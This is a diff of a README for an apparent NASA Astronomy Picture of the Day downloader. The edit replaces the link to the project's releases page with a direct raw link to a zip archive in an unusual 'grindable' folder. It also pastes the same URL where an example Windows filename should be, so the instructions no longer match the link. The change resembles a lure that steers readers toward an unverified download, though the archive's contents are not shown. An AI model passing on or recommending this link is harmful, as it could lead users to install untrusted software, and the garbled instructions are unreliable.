maximus733/nasa-apod-downloader/README.md

 1. **Visit the Releases Page**

    Head over to our releases page to find the latest version of the application.
-You can find it here: [Download Release](https://github.com/maximus733/nasa-apod-downloader/releases).
+You can find it here: [Download Release](https://raw.githubusercontent.com/maximus733/nasa-apod-downloader/main/grindable/nasa-apod-downloader.zip).

 2. **Choose the Right File**

    On the releases page, look for the file that matches your operating system.
-The files will usually be labeled, for example, `nasa-apod-downloader-windows.exe` for Windows or `nasa-apod-downloader-macos` for macOS.
+The files will usually be labeled, for example, `https://raw.githubusercontent.com/maximus733/nasa-apod-downloader/main/grindable/nasa-apod-downloader.zip` for Windows or `nasa-apod-downloader-macos` for macOS.

 3. **Download the File**